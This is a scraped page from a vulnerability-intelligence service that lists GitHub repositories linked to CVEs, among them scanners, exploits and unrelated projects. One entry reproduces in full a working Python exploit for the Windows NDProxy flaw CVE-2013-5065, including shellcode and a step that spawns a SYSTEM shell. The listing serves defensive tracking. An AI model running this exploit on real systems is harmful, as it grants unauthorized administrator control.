Initial Access Intelligence

The "Initial Access Intelligence" module is a vital tool for cybersecurity, designed to scan GitHub repositories for the latest exploit and proof-of-concept codes for new vulnerabilities. It provides users with crucial updates on potential security threats, enabling proactive defense measures. This module helps close the gap between vulnerability discovery and patching, significantly enhancing system security.

  • Aug. 12, 2024, 7:12 p.m.

    A collection of security related Python and Bash shell scripts. Analyze hosts on generic security vulnerabilities. Wrapper around popular tools like nmap (portscanner), nikto (webscanner) and testssl.sh (SSL/TLS scanner)

    nmap ssl testssl python nikto security-tools security-scanner security

    Shell Python Dockerfile Makefile HTML

    Updated: 1 month, 1 week ago
    262 stars 72 fork 72 watcher
    Born at : Dec. 22, 2013, 2:40 a.m. This repo has been linked 1 different CVEs too.
  • June 22, 2023, 11:40 a.m.

    Using CVE-2013-6282 to bypass Samsung kernel module authentication

    C

    Updated: 1 year, 2 months ago
    13 stars 4 fork 4 watcher
    Born at : Dec. 21, 2013, 1:51 a.m. This repo has been linked 1 different CVEs too.
  • Sept. 22, 2022, 1:43 p.m.

    Exceed OnDemand MITM proof-of-concept

    Python

    Updated: 1 year, 11 months ago
    3 stars 0 fork 0 watcher
    Born at : Dec. 16, 2013, 4:48 p.m. This repo has been linked 3 different CVEs too.
  • Aug. 12, 2024, 7:12 p.m.

    A PHP version scanner for reporting possible vulnerabilities

    security php scans risk cve

    PHP HTML

    Updated: 1 month, 1 week ago
    254 stars 24 fork 24 watcher
    Born at : Dec. 13, 2013, 9:03 p.m. This repo has been linked 2 different CVEs too.
  • Jan. 7, 2014, 1:19 p.m.

    bind9.9.4 定制版本

    C XSLT Perl Shell C++ Objective-C Tcl Python Awk CSS

    Updated: 10 years, 8 months ago
    0 stars 1 fork 1 watcher
    Born at : Dec. 12, 2013, 3:26 p.m. This repo has been linked 0 different CVEs too.
  • Sept. 4, 2016, 4:47 p.m.

    # NDPROXY Local SYSTEM privilege escalation # http://www.offensive-security.com # Tested on Windows XP SP3 # http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/     # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ??              ???   from ctypes import * from ctypes.wintypes import * import os, sys   kernel32 = windll.kernel32 ntdll = windll.ntdll   GENERIC_READ     = 0x80000000 GENERIC_WRITE    = 0x40000000 FILE_SHARE_READ  = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE            = 0x0020 PROCESS_VM_READ             = 0x0010 MEM_COMMIT                  = 0x00001000 MEM_RESERVE                 = 0x00002000 MEM_FREE                    = 0x00010000 PAGE_EXECUTE_READWRITE      = 0x00000040 PROCESS_ALL_ACCESS          = 2097151 FORMAT_MESSAGE_FROM_SYSTEM  = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0   def log(msg):     print msg   def getLastError():     """[-] Format GetLastError"""     buf = create_string_buffer(2048)     if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,             kernel32.GetLastError(), 0,             buf, sizeof(buf), NULL):         log(buf.value)     else:         log("[-] Unknown Error")   print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day" print "[*] Vulnerability found in the wild" print "[*] Coded by Offensive Security"                 tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24) InBuf = c_char_p(tmp)   dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS:     print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus     getLastError() written = c_ulong() sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3" sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0:     print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc     getLastError()   dwRetBytes = DWORD(0) DEVICE_NAME   = "\\\\.\\NDProxy" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1:     print "[-] Couldn't open the device... :("     sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print "[+] Spawning SYSTEM Shell..." os.system("start /d \"C:\\windows\\system32\" cmd.exe")

    Updated: 8 years ago
    0 stars 1 fork 1 watcher
    Born at : Dec. 7, 2013, 5:37 a.m. This repo has been linked 1 different CVEs too.
  • March 1, 2017, 1:21 a.m.

    Personal resume with personal/location information redacted.

    Shell CSS

    Updated: 7 years, 6 months ago
    0 stars 0 fork 0 watcher
    Born at : Dec. 2, 2013, 2:57 a.m. This repo has been linked 2 different CVEs too.
  • May 21, 2022, 4:49 a.m.

    CVE-2013-6282 exploit

    C

    Updated: 2 years, 3 months ago
    7 stars 2 fork 2 watcher
    Born at : Nov. 28, 2013, 8:34 a.m. This repo has been linked 1 different CVEs too.
  • March 24, 2023, 11:10 p.m.

    My Vim configuration

    vim vimrc vim-configuration vim-configs vimscript vim-script viml

    Vim Script

    Updated: 1 year, 5 months ago
    1 stars 0 fork 0 watcher
    Born at : Nov. 28, 2013, 12:38 a.m. This repo has been linked 0 different CVEs too.
  • Jan. 20, 2022, 12:45 a.m.

    Read and write Java-style .properties files with minimal intrusiveness

    Ruby

    Updated: 2 years, 8 months ago
    4 stars 1 fork 1 watcher
    Born at : Nov. 27, 2013, 4:04 p.m. This repo has been linked 1 different CVEs too.
Showing 10 of 37116 Results

Filters